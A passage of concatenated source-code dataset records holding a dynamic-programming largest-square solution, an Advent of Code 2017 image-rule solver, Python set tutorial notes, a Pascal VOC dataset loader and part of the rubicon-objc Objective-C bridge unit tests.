self.vel_pubs[agent].publish(t)\n","sub_path":"src/multiagent_env.py","file_name":"multiagent_env.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"192815089","text":"# 0920\n# Find the largest square\n# idea: dynamic programming - dp[i][j] is the side of the largest all-ones square whose bottom-right corner is (i, j)\ndef solution(board):\n    n = len(board)\n    m = len(board[0])\n\n    dp = [[0] * m for _ in range(n)]\n    dp[0] = board[0]\n    for i in range(1, n):\n        dp[i][0] = board[i][0]\n\n    for i in range(1, n):\n        for j in range(1, m):\n            if board[i][j] == 1:\n                dp[i][j] = min(dp[i - 1][j - 1], dp[i - 1][j], dp[i][j - 1]) + 1\n\n    answer = 0\n    for i in range(n):\n        temp = max(dp[i])\n        answer = max(answer, temp)\n    print(dp)\n    return answer ** 2\n\nprint(solution([[0,1,1,1],[1,1,1,1],[1,1,1,1],[0,0,1,0]]))","sub_path":"Level 2/가장 큰 정사각형 찾기.py","file_name":"가장 큰 정사각형 찾기.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
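# The record above uses the classic largest-square recurrence
# dp[i][j] = min(dp[i-1][j-1], dp[i-1][j], dp[i][j-1]) + 1 on cells equal to 1.
# A hand trace of the sample call (added illustration, not part of the record):
#   board = [[0,1,1,1],        dp = [[0,1,1,1],
#            [1,1,1,1],              [1,1,2,2],
#            [1,1,1,1],              [1,2,2,3],
#            [0,0,1,0]]              [0,0,1,0]]
# The largest side is 3, so solution(board) returns 3 ** 2 == 9.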
 +{"seq_id":"277970247","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef main():\n    with open('21_input.txt', 'r') as rules_file:\n        lines = rules_file.read().strip().split('\\n')\n\n    rules = expand_rules(lines)\n    art = to_pixel('.#./..#/###')\n    for i in range(18):\n        size = len(art[0])\n        d = (2 if size % 2 == 0 else 3)\n        partitions = partition(art, d)\n        art = apply_rules(art, partitions, rules, d)\n\n    print('Answer:', light_on_count(art))\n\n\ndef expand_rules(lines):\n    expanded_rules = {}\n    for line in lines:\n        lhs, rhs = map(to_pixel, line.split('=>'))\n        for r in range(4):\n            expanded_rules[lhs] = rhs\n            expanded_rules[flip(lhs)] = rhs\n            lhs = rotate(lhs)\n    return expanded_rules\n\n\ndef to_pixel(text):\n    bits = {'.': 0, '#': 1}\n    pixels = []\n    for token in text.split('/'):\n        pixels.append(tuple(bits[p] for p in token.strip()))\n    return tuple(pixels)\n\n\ndef rotate(text):\n    return tuple(zip(*reversed(text)))\n\n\ndef flip(text):\n    return tuple(tuple(reversed(row)) for row in text)\n\n\ndef partition(art, d):\n    res = []\n    for outer_row in range(0, len(art), d):\n        for inner_col in range(0, len(art[0]), d):\n            tmp = []\n            for inner_row in range(outer_row, outer_row+d):\n                tmp.append(tuple(art[inner_row][inner_col:inner_col+d]))\n            res.append(tuple(tmp))\n    return tuple(res)\n\n\ndef apply_rules(art, partitions, rules, d):\n    output = tuple(rules[partition] for partition in partitions)\n    height_in_boxes = len(art) // d\n    expand_map = {2:3, 3:4}\n    new_art = []\n    for rows in range(0, len(partitions), height_in_boxes):\n        for i in range(expand_map[d]):\n            tmp = []\n            for j in range(rows, rows+height_in_boxes):\n                tmp.extend(output[j][i])\n            new_art.append(tuple(tmp))\n    return tuple(new_art)\n\n\ndef light_on_count(art):\n    count = 0\n    for row in art:\n        count += row.count(1)\n    return count\n\n\ndef print_art(art):\n    for row in art:\n        print(row)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"2017/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246617163","text":"def Set():\n\t'''\n\t\tWhy sets?\n\t\tSet operations have a variety of common uses, some more practical than mathematical.\n\t\tFor example, because items are stored only once in a set, sets can be used to filter\n\t\tduplicates out of other collections, though items may be reordered in the process because\n\t\tsets are unordered in general. Simply convert the collection to a set, and then\n\t\tconvert it back again (sets work in the list call here because they are iterable, another\n\t\ttechnical artifact that we’ll unearth later):\n\t'''\n\tX = set('spam')\n\t{'m', 'a', 'p', 's'}\n\n\tY = {'h', 'a', 'm'} # Make a set with set literals in 3.X and 2.7\n\t{'m', 'a', 'h'}\n\ndef Set_Operations():\n\tx = set('abcde')\n\ty = set('bdxyz')\n\n\tx - y \t\t\t\t\t\t\t\t\t\t\t\t# Difference\n\tset(['a', 'c', 'e'])\n\n\tx | y \t\t\t\t\t\t\t\t\t\t\t\t# Union\n\tset(['a', 'c', 'b', 'e', 'd', 'y', 'x', 'z'])\n\n\tx & y \t\t\t\t\t\t\t\t\t\t\t\t# Intersection\n\tset(['b', 'd'])\n\n\tx ^ y \t\t\t\t\t\t\t\t\t\t\t\t# Symmetric difference (XOR)\n\tset(['a', 'c', 'e', 'y', 'x', 'z'])\n\n\tx > y, x < y \t\t\t\t\t\t\t\t\t\t# Superset, subset\n\t(False, False)\n\n\t'e' in x\t\t\t\t\t\t\t\t\t\t\t# Membership (sets)\n\tTrue\n\ndef Set_comprehensions():\n\ta=set('spam')\n\ta={x for x in 'spam'} # Same as: set('spam')\n\t{'m', 's', 'p', 'a'}\n\n\t{c * 4 for c in 'spam'} # Set of collected expression results\n\t{'pppp', 'aaaa', 'ssss', 'mmmm'}\n\n\ndef Set_Functions():\n\tx = set('abcde')\n\ty = set('bdxyz')\n\n\tz = x.intersection(y)# Same as x & y\n\t# >>> z = set(['b', 'd'])\n\n\tz.add('SPAM') # to add element to set \t\t\t\t\t# Insert one item\n\t# >>> z= set(['b', 'd', 'SPAM'])\n\n\tz.update(set(['X', 'Y'])) # to add set to another\t\t# Merge: in-place union\n\t# >>> z= set(['Y', 'X', 'b', 'd', 'SPAM'])\n\n\tz.remove('b') # Delete one item\n\t# >>> set(['Y', 'X', 'd', 'SPAM'])\n\n\tx,y={1,2,3},{1,2,3,4,5}\n\tx.issubset(y) #>>> True\n\n\ty.union(x) # Same as x | y\n\t#>>> {'a','b','c','d','e','z','y','x'}\n\n\nif __name__ == '__main__':\n\tSet()\n\tSet_Operations()\n\tSet_comprehensions()\n\tSet_Functions()\n\n","sub_path":"Learning_python/07.Set.py","file_name":"07.Set.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
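# A minimal demo of the de-duplication idiom described in the Set() docstring
# above (the variable names are illustrative; result order is arbitrary
# because sets are unordered):
items = ['spam', 'ham', 'spam', 'eggs']
unique = list(set(items))              # e.g. ['ham', 'eggs', 'spam']
assert sorted(unique) == ['eggs', 'ham', 'spam']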
 +{"seq_id":"576281528","text":"from scipy.misc import imread\nimport numpy as np\nimport sys\nimport os\n\nif sys.version_info[0] == 2:\n    import xml.etree.cElementTree as ET\nelse:\n    import xml.etree.ElementTree as ET\n\nVOC_CLASSES = [\n    'aeroplane', 'bicycle', 'bird', 'boat',\n    'bottle', 'bus', 'car', 'cat', 'chair',\n    'cow', 'diningtable', 'dog', 'horse',\n    'motorbike', 'person', 'pottedplant',\n    'sheep', 'sofa', 'train', 'tvmonitor']\n\n\nclass VOCLoader:\n    def __init__(self, root, image_sets, prop_method):\n        if prop_method == 'ss':\n            prop_dir = os.path.join('../data', 'voc07_proposals', 'selective_search')\n        elif prop_method == 'eb':\n            prop_dir = os.path.join('../data', 'voc07_proposals', 'edge_boxes_70')\n        elif prop_method == 'mcg':\n            prop_dir = os.path.join('../data', 'voc07_proposals', 'MCG2015')\n        else:\n            raise Exception('Undefined proposal name')\n        self.items = []\n        self.num_classes = 0\n        self.name_to_index = dict(zip(VOC_CLASSES, range(len(VOC_CLASSES))))\n        print('dataset loading...' + repr(image_sets))\n        for (year, name) in image_sets:\n            rootpath = os.path.join(root, 'VOC' + year)\n            for line in open(os.path.join(rootpath, 'ImageSets', 'Main', name + '.txt')):\n                data = {}\n                id = line.strip()\n                target = ET.parse(os.path.join(rootpath, 'Annotations', line.strip() + '.xml'))\n\n                box_set = []\n                category_set = []\n                for obj in target.iter('object'):\n                    cls_name = obj.find('name').text.strip().lower()\n                    bbox = obj.find('bndbox')\n\n                    xmin = int(bbox.find('xmin').text) - 1\n                    ymin = int(bbox.find('ymin').text) - 1\n                    xmax = int(bbox.find('xmax').text) - 1\n                    ymax = int(bbox.find('ymax').text) - 1\n\n                    category = self.name_to_index[cls_name]\n                    box_set.append(np.array([xmin, ymin, xmax, ymax], np.float32))\n                    category_set.append(category)\n\n                data['id'] = id\n                data['boxes'] = np.array(box_set)\n                data['categories'] = np.array(category_set, np.int64)\n                data['img_full_path'] = os.path.join(rootpath, 'JPEGImages', line.strip() + '.jpg')\n                data['prop_path'] = os.path.join(prop_dir, 'mat', id[:4], '%s.mat' % id)\n                self.items.append(data)\n\n        print('dataset loading complete')\n\n    def __len__(self):\n        return len(self.items)\n\n\nclass VOCLoaderFewShot:\n    def __init__(self, root, image_sets, K):\n        self.items = []\n        self.num_classes = 0\n        self.name_to_index = dict(zip(VOC_CLASSES, range(len(VOC_CLASSES))))\n\n        dupl_check = {}\n        print('dataset loading...' + repr(image_sets))\n        for (year, name) in image_sets:\n            rootpath = os.path.join(root, 'VOC' + year)\n            for cls, cls_name in enumerate(VOC_CLASSES):\n                anno_file = open(os.path.join(rootpath, 'ImageSets', 'Main', cls_name + '_trainval.txt')).readlines()\n                k = 0\n                for idx in np.random.permutation(len(anno_file)):\n                    line, exist = anno_file[idx].split()\n                    if exist == '-1':\n                        continue\n                    if line.strip() in dupl_check:\n                        print('dupl')\n                        continue\n                    dupl_check[line.strip()] = True\n                    data = {}\n                    id = 'VOC' + year + '_' + line.strip()\n                    target = ET.parse(os.path.join(rootpath, 'Annotations', line.strip() + '.xml'))\n\n                    box_set = []\n                    category_set = []\n                    for obj in target.iter('object'):\n                        cls_name = obj.find('name').text.strip().lower()\n                        bbox = obj.find('bndbox')\n\n                        xmin = int(bbox.find('xmin').text) - 1\n                        ymin = int(bbox.find('ymin').text) - 1\n                        xmax = int(bbox.find('xmax').text) - 1\n                        ymax = int(bbox.find('ymax').text) - 1\n\n                        category = self.name_to_index[cls_name]\n                        box_set.append(np.array([xmin, ymin, xmax, ymax], np.float32))\n                        category_set.append(category)\n\n                    data['id'] = id\n                    data['boxes'] = np.array(box_set)\n                    data['categories'] = np.array(category_set, np.int64)\n                    data['img_full_path'] = os.path.join(rootpath, 'JPEGImages', line.strip() + '.jpg')\n                    self.items.append(data)\n                    k += 1\n                    if k == K:\n                        break\n\n        print('dataset loading complete')\n\n    def __len__(self):\n        return len(self.items)","sub_path":"lib/datasets/voc_loader.py","file_name":"voc_loader.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259798218","text":"from ctypes import *\nfrom ctypes import util\nfrom decimal import Decimal\nfrom enum import Enum\nimport functools\nimport math\nimport unittest\n\ntry:\n    import platform\n    OSX_VERSION = tuple(int(v) for v in platform.mac_ver()[0].split('.')[:2])\nexcept Exception:\n    OSX_VERSION = None\n\nimport faulthandler\nfaulthandler.enable()\n\nfrom rubicon.objc import (\n    ObjCInstance, ObjCClass, ObjCMetaClass,\n    NSObject, SEL,\n    objc, objc_method, objc_classmethod, objc_property,\n    NSUInteger, NSRange, NSEdgeInsets, NSEdgeInsetsMake,\n    
send_message, objc_const, ObjCBlock\n)\nfrom rubicon.objc import core_foundation, types\nfrom rubicon.objc.objc import ObjCBoundMethod, objc_block, objc_id, Class, Block\n\n# Load the test harness library\nrubiconharness_name = util.find_library('rubiconharness')\nif rubiconharness_name is None:\n raise RuntimeError(\"Couldn't load Rubicon test harness library. Have you set DYLD_LIBRARY_PATH?\")\nrubiconharness = CDLL(rubiconharness_name)\n\n\nclass RubiconTest(unittest.TestCase):\n def test_sel_by_name(self):\n self.assertEqual(SEL(b\"foobar\").name, b\"foobar\")\n\n def test_sel_null(self):\n with self.assertRaises(ValueError):\n SEL(None).name\n\n def test_class_by_name(self):\n \"\"\"An Objective-C class can be looked up by name.\"\"\"\n\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.name, \"Example\")\n\n def test_objcclass_caching(self):\n \"\"\"ObjCClass instances are cached.\"\"\"\n\n Example1 = ObjCClass(\"Example\")\n Example2 = ObjCClass(\"Example\")\n\n self.assertIs(Example1, Example2)\n\n def test_class_by_pointer(self):\n \"\"\"An Objective-C class can be created from a pointer.\"\"\"\n\n example_ptr = objc.objc_getClass(b\"Example\")\n Example = ObjCClass(example_ptr)\n self.assertEqual(Example, ObjCClass(\"Example\"))\n\n def test_nonexistant_class(self):\n \"\"\"A NameError is raised if a class doesn't exist.\"\"\"\n\n with self.assertRaises(NameError):\n ObjCClass('DoesNotExist')\n\n def test_metaclass_by_name(self):\n \"\"\"An Objective-C metaclass can be looked up by name.\"\"\"\n\n Example = ObjCClass(\"Example\")\n ExampleMeta = ObjCMetaClass(\"Example\")\n\n self.assertEqual(ExampleMeta.name, \"Example\")\n self.assertEqual(ExampleMeta, Example.objc_class)\n\n def test_objcmetaclass_caching(self):\n \"\"\"ObjCMetaClass instances are cached.\"\"\"\n\n ExampleMeta1 = ObjCMetaClass(\"Example\")\n ExampleMeta2 = ObjCMetaClass(\"Example\")\n\n self.assertIs(ExampleMeta1, ExampleMeta2)\n\n def test_metaclass_by_pointer(self):\n \"\"\"An Objective-C metaclass can be created from a pointer.\"\"\"\n\n examplemeta_ptr = objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCMetaClass(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n\n def test_nonexistant_metaclass(self):\n \"\"\"A NameError is raised if a metaclass doesn't exist.\"\"\"\n\n with self.assertRaises(NameError):\n ObjCMetaClass('DoesNotExist')\n\n def test_metametaclass(self):\n \"\"\"The class of a metaclass can be looked up.\"\"\"\n\n ExampleMeta = ObjCMetaClass(\"Example\")\n ExampleMetaMeta = ExampleMeta.objc_class\n\n self.assertIsInstance(ExampleMetaMeta, ObjCMetaClass)\n self.assertEqual(ExampleMetaMeta, NSObject.objc_class)\n\n def test_objcinstance_can_produce_objcclass(self):\n \"\"\"Creating an ObjCInstance for a class pointer gives an ObjCClass.\"\"\"\n\n example_ptr = objc.objc_getClass(b\"Example\")\n Example = ObjCInstance(example_ptr)\n self.assertEqual(Example, ObjCClass(\"Example\"))\n self.assertIsInstance(Example, ObjCClass)\n\n def test_objcinstance_can_produce_objcmetaclass(self):\n \"\"\"Creating an ObjCInstance for a metaclass pointer gives an ObjCMetaClass.\"\"\"\n\n examplemeta_ptr = objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCInstance(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n self.assertIsInstance(ExampleMeta, ObjCMetaClass)\n\n def test_objcclass_can_produce_objcmetaclass(self):\n \"\"\"Creating an ObjCClass for a metaclass pointer gives an ObjCMetaclass.\"\"\"\n\n examplemeta_ptr = 
objc.objc_getMetaClass(b\"Example\")\n ExampleMeta = ObjCClass(examplemeta_ptr)\n self.assertEqual(ExampleMeta, ObjCMetaClass(\"Example\"))\n self.assertIsInstance(ExampleMeta, ObjCMetaClass)\n\n def test_objcclass_requires_class(self):\n \"\"\"ObjCClass only accepts class pointers.\"\"\"\n\n random_obj = NSObject.alloc().init()\n with self.assertRaises(ValueError):\n ObjCClass(random_obj.ptr)\n random_obj.release()\n\n def test_objcmetaclass_requires_metaclass(self):\n \"\"\"ObjCMetaClass only accepts metaclass pointers.\"\"\"\n\n random_obj = NSObject.alloc().init()\n with self.assertRaises(ValueError):\n ObjCMetaClass(random_obj.ptr)\n random_obj.release()\n\n with self.assertRaises(ValueError):\n ObjCMetaClass(NSObject.ptr)\n\n def test_objcclass_superclass(self):\n Example = ObjCClass(\"Example\")\n BaseExample = ObjCClass(\"BaseExample\")\n\n self.assertEqual(Example.superclass, BaseExample)\n self.assertEqual(BaseExample.superclass, NSObject)\n self.assertIsNone(NSObject.superclass)\n\n def test_objcmetaclass_superclass(self):\n Example = ObjCClass(\"Example\")\n BaseExample = ObjCClass(\"BaseExample\")\n\n self.assertEqual(Example.objc_class.superclass, BaseExample.objc_class)\n self.assertEqual(BaseExample.objc_class.superclass, NSObject.objc_class)\n self.assertEqual(NSObject.objc_class.superclass, NSObject)\n\n def test_field(self):\n \"A field on an instance can be accessed and mutated\"\n\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.baseIntField, 22)\n self.assertEqual(obj.intField, 33)\n\n obj.baseIntField = 8888\n obj.intField = 9999\n\n self.assertEqual(obj.baseIntField, 8888)\n self.assertEqual(obj.intField, 9999)\n\n def test_method(self):\n \"An instance method can be invoked.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.accessBaseIntField(), 22)\n self.assertEqual(obj.accessIntField(), 33)\n\n obj.mutateBaseIntFieldWithValue_(8888)\n obj.mutateIntFieldWithValue_(9999)\n\n self.assertEqual(obj.accessBaseIntField(), 8888)\n self.assertEqual(obj.accessIntField(), 9999)\n\n def test_method_send(self):\n \"An instance method can be invoked with send_message.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(send_message(obj, \"accessBaseIntField\", restype=c_int), 22)\n self.assertEqual(send_message(obj, \"accessIntField\", restype=c_int), 33)\n\n send_message(obj, \"mutateBaseIntFieldWithValue:\", 8888, restype=None, argtypes=[c_int])\n send_message(obj, \"mutateIntFieldWithValue:\", 9999, restype=None, argtypes=[c_int])\n\n self.assertEqual(send_message(obj, \"accessBaseIntField\", restype=c_int), 8888)\n self.assertEqual(send_message(obj, \"accessIntField\", restype=c_int), 9999)\n\n def test_static_field(self):\n \"A static field on a class can be accessed and mutated\"\n Example = ObjCClass('Example')\n\n Example.mutateStaticBaseIntFieldWithValue_(1)\n Example.mutateStaticIntFieldWithValue_(11)\n\n self.assertEqual(Example.staticBaseIntField, 1)\n self.assertEqual(Example.staticIntField, 11)\n\n Example.staticBaseIntField = 1188\n Example.staticIntField = 1199\n\n self.assertEqual(Example.staticBaseIntField, 1188)\n self.assertEqual(Example.staticIntField, 1199)\n\n def test_static_method(self):\n \"A static method on a class can be invoked.\"\n Example = ObjCClass('Example')\n\n Example.mutateStaticBaseIntFieldWithValue_(2288)\n Example.mutateStaticIntFieldWithValue_(2299)\n\n self.assertEqual(Example.accessStaticBaseIntField(), 2288)\n 
self.assertEqual(Example.accessStaticIntField(), 2299)\n\n def test_mutator_like_method(self):\n \"A method that looks like a mutator doesn't confuse issues.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # setSpecialValue: looks like it might be a mutator\n # for a specialValue property, but this property doesn't exist.\n\n # We can invoke the method directly...\n obj1.setSpecialValue_(42)\n\n # ... but retrieving like a property is an error\n with self.assertRaises(AttributeError):\n obj1.specialValue\n\n # ...until you set it explicitly...\n obj1.specialValue = 37\n\n # ...at which point it's fair game to be retrieved.\n self.assertEqual(obj1.specialValue, 37)\n\n def test_property_forcing(self):\n \"An instance or property method can be explicitly declared as a property.\"\n Example = ObjCClass('Example')\n Example.declare_class_property('classMethod')\n Example.declare_class_property('classAmbiguous')\n Example.declare_property('instanceMethod')\n Example.declare_property('instanceAmbiguous')\n\n # A class method can be turned into a property\n self.assertEqual(Example.classMethod, 37)\n\n # An actual class property can be accessed as a property\n self.assertEqual(Example.classAmbiguous, 37)\n\n # An instance property can be accessed\n obj1 = Example.alloc().init()\n\n # An instance method can be turned into a property\n self.assertEqual(obj1.instanceMethod, 42)\n\n # An actual property can be accessed as a property\n self.assertEqual(obj1.instanceAmbiguous, 42)\n\n # Practical example: In Sierra, mainBundle was turned into a class property.\n # Previously, it was a method.\n NSBundle = ObjCClass('NSBundle')\n NSBundle.declare_class_property('mainBundle')\n self.assertFalse(type(NSBundle.mainBundle) == ObjCBoundMethod, 'NSBundle.mainBundle should not be a method')\n\n def test_non_existent_field(self):\n \"An attribute error is raised if you invoke a non-existent field.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # Non-existent fields raise an error.\n with self.assertRaises(AttributeError):\n obj1.field_doesnt_exist\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n obj1.field_doesnt_exist\n\n def test_non_existent_method(self):\n \"An attribute error is raised if you invoke a non-existent method.\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n\n # Non-existent methods raise an error.\n with self.assertRaises(AttributeError):\n obj1.method_doesnt_exist()\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n obj1.method_doesnt_exist()\n\n def test_non_existent_static_field(self):\n \"An attribute error is raised if you invoke a non-existent static field.\"\n Example = ObjCClass('Example')\n\n # Non-existent fields raise an error.\n with self.assertRaises(AttributeError):\n Example.static_field_doesnt_exist\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n Example.static_field_doesnt_exist\n\n def test_non_existent_static_method(self):\n \"An attribute error is raised if you invoke a non-existent static method.\"\n Example = ObjCClass('Example')\n\n # Non-existent methods raise an error.\n with self.assertRaises(AttributeError):\n Example.static_method_doesnt_exist()\n\n # Cache warming doesn't affect anything.\n with self.assertRaises(AttributeError):\n Example.static_method_doesnt_exist()\n\n def test_polymorphic_constructor(self):\n \"Check that the right constructor is activated based on 
arguments used\"\n Example = ObjCClass('Example')\n\n obj1 = Example.alloc().init()\n obj2 = Example.alloc().initWithIntValue_(2242)\n obj3 = Example.alloc().initWithBaseIntValue_intValue_(3342, 3337)\n\n self.assertEqual(obj1.baseIntField, 22)\n self.assertEqual(obj1.intField, 33)\n\n self.assertEqual(obj2.baseIntField, 44)\n self.assertEqual(obj2.intField, 2242)\n\n self.assertEqual(obj3.baseIntField, 3342)\n self.assertEqual(obj3.intField, 3337)\n\n # Protected constructors can't be invoked\n with self.assertRaises(AttributeError):\n Example.alloc().initWithString_(\"Hello\")\n\n def test_static_access_non_static(self):\n \"An instance field/method cannot be accessed from the static context\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n with self.assertRaises(AttributeError):\n obj.staticIntField\n\n with self.assertRaises(AttributeError):\n obj.get_staticIntField()\n\n def test_non_static_access_static(self):\n \"A static field/method cannot be accessed from an instance context\"\n Example = ObjCClass('Example')\n\n with self.assertRaises(AttributeError):\n Example.intField\n\n with self.assertRaises(AttributeError):\n Example.accessIntField()\n\n def test_string_argument(self):\n \"A method with a string argument can be passed.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.duplicateString_(\"Wagga\"), \"WaggaWagga\")\n\n def test_enum_argument(self):\n \"An enumerated type can be used as an argument.\"\n Example = ObjCClass('Example')\n\n obj = Example.alloc().init()\n\n self.assertEqual(obj.accessBaseIntField(), 22)\n self.assertEqual(obj.accessIntField(), 33)\n\n class MyEnum(Enum):\n value1 = 8888\n value2 = 9999\n value3 = 3333\n value4 = 4444\n\n obj.mutateBaseIntFieldWithValue_(MyEnum.value1)\n obj.mutateIntFieldWithValue_(MyEnum.value2)\n\n self.assertEqual(obj.accessBaseIntField(), MyEnum.value1.value)\n self.assertEqual(obj.accessIntField(), MyEnum.value2.value)\n\n obj.baseIntField = MyEnum.value3\n obj.intField = MyEnum.value4\n\n self.assertEqual(obj.accessBaseIntField(), MyEnum.value3.value)\n self.assertEqual(obj.accessIntField(), MyEnum.value4.value)\n\n def test_string_return(self):\n \"If a method or field returns a string, you get a Python string back\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.toString(), \"This is an ObjC Example object\")\n\n def test_constant_string_return(self):\n \"If a method or field returns a *constant* string, you get a Python string back\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.smiley(), \"%-)\")\n\n def test_number_return(self):\n \"If a method or field returns a NSNumber, it is converted back to native types\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n self.assertEqual(example.theAnswer(), 42)\n self.assertAlmostEqual(example.twopi(), 2.0 * math.pi, 5)\n\n def test_float_method(self):\n \"A method with a float argument can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(example.areaOfSquare_(1.5), 2.25)\n\n def test_float_method_send(self):\n \"A method with a float argument can be handled by send_message.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertEqual(send_message(example, \"areaOfSquare:\", 1.5, restype=c_float, argtypes=[c_float]), 2.25)\n\n def test_double_method(self):\n \"A method with a double argument can be handled.\"\n 
Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertAlmostEqual(example.areaOfCircle_(1.5), 1.5 * math.pi, 5)\n\n def test_double_method_send(self):\n \"A method with a double argument can be handled by send_message.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n self.assertAlmostEqual(send_message(example, \"areaOfCircle:\", 1.5, restype=c_double, argtypes=[c_double]), 1.5 * math.pi, 5)\n\n @unittest.skipIf(OSX_VERSION and OSX_VERSION < (10, 10),\n \"Property handling doesn't work on OS X 10.9 (Mavericks) and earlier\")\n def test_decimal_method(self):\n \"A method with a NSDecimalNumber arguments can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n result = example.areaOfTriangleWithWidth_andHeight_(Decimal('3.0'), Decimal('4.0'))\n self.assertEqual(result, Decimal('6.0'))\n self.assertIsInstance(result, Decimal, 'Result should be a Decimal')\n \n def test_auto_struct_creation(self):\n \"Structs from method signatures are created automatically.\"\n Example = ObjCClass('Example')\n \n types.unregister_encoding_all(b'{simple=ii}')\n types.unregister_encoding_all(b'{simple}')\n types.unregister_encoding_all(b'{complex=[4s]^?{simple=ii}^{complex}b8b16b8}')\n types.unregister_encoding_all(b'{complex}')\n \n # Look up the method, so the return/argument types are decoded and the structs are registered.\n Example.doStuffWithStruct_\n \n struct_simple = types.ctype_for_encoding(b'{simple=ii}')\n self.assertEqual(struct_simple, types.ctype_for_encoding(b'{simple}'))\n \n simple = struct_simple(123, 456)\n ret = Example.doStuffWithStruct_(simple)\n struct_complex = types.ctype_for_encoding(b'{complex=[4s]^?{simple=ii}^{complex}b8b16b8}')\n self.assertIsInstance(ret, struct_complex)\n self.assertEqual(struct_complex, types.ctype_for_encoding(b'{complex}'))\n self.assertEqual(list(ret.field_0), [1, 2, 3, 4])\n self.assertEqual(ret.field_1.value, None)\n self.assertEqual(ret.field_2.field_0, 123)\n self.assertEqual(ret.field_2.field_1, 456)\n self.assertEqual(cast(ret.field_3, c_void_p).value, None)\n self.assertEqual(ret.field_4, 0)\n self.assertEqual(ret.field_5, 1)\n self.assertEqual(ret.field_6, 2)\n\n def test_sequence_arg_to_struct(self):\n \"Sequence arguments are converted to structures.\"\n Example = ObjCClass('Example')\n \n ret = Example.extractSimpleStruct(([9, 8, 7, 6], None, (987, 654), None, 0, 0, 0))\n struct_simple = types.ctype_for_encoding(b'{simple=ii}')\n self.assertIsInstance(ret, struct_simple)\n self.assertEqual(ret.field_0, 987)\n self.assertEqual(ret.field_1, 654)\n\n def test_struct_return(self):\n \"Methods returning structs of different sizes by value can be handled.\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n class struct_int_sized(Structure):\n _fields_ = [(\"x\", c_char * 4)]\n types.register_encoding(b'{int_sized=[4c]}', struct_int_sized)\n\n self.assertEqual(example.intSizedStruct().x, b\"abc\")\n class struct_oddly_sized(Structure):\n _fields_ = [(\"x\", c_char * 5)]\n\n types.register_encoding(b'{oddly_sized=[5c]}', struct_oddly_sized)\n self.assertEqual(example.oddlySizedStruct().x, b\"abcd\")\n\n class struct_large(Structure):\n _fields_ = [(\"x\", c_char * 17)]\n\n types.register_encoding(b'{large=[17c]}', struct_large)\n self.assertEqual(example.largeStruct().x, b\"abcdefghijklmnop\")\n\n def test_struct_return_send(self):\n \"Methods returning structs of different sizes by value can be handled when using send_message.\"\n Example = 
ObjCClass('Example')\n example = Example.alloc().init()\n\n class struct_int_sized(Structure):\n _fields_ = [(\"x\", c_char * 4)]\n\n self.assertEqual(send_message(example, \"intSizedStruct\", restype=struct_int_sized).x, b\"abc\")\n\n\n class struct_oddly_sized(Structure):\n _fields_ = [(\"x\", c_char * 5)]\n\n self.assertEqual(send_message(example, \"oddlySizedStruct\", restype=struct_oddly_sized).x, b\"abcd\")\n\n class struct_large(Structure):\n _fields_ = [(\"x\", c_char * 17)]\n\n self.assertEqual(send_message(example, \"largeStruct\", restype=struct_large).x, b\"abcdefghijklmnop\")\n\n def test_object_return(self):\n \"If a method or field returns an object, you get an instance of that type returned\"\n Example = ObjCClass('Example')\n example = Example.alloc().init()\n\n Thing = ObjCClass('Thing')\n thing = Thing.alloc().initWithName_value_('This is thing', 2)\n\n example.thing = thing\n\n the_thing = example.thing\n self.assertEqual(the_thing.toString(), \"This is thing 2\")\n\n def test_no_convert_return(self):\n Example = ObjCClass(\"Example\")\n example = Example.alloc().init()\n\n res = example.toString(convert_result=False)\n self.assertNotIsInstance(res, ObjCInstance)\n self.assertEqual(str(ObjCInstance(res)), \"This is an ObjC Example object\")\n\n def test_partial_method_no_args(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(), 0)\n\n def test_partial_method_one_arg(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(42), 42)\n\n def test_partial_method_two_args(self):\n Example = ObjCClass(\"Example\")\n self.assertEqual(Example.overloaded(12, extraArg=34), 12+34)\n\n def test_partial_method_lots_of_args(self):\n pystring = \"Uñîçö∂€\"\n pybytestring = pystring.encode(\"utf-8\")\n nsstring = 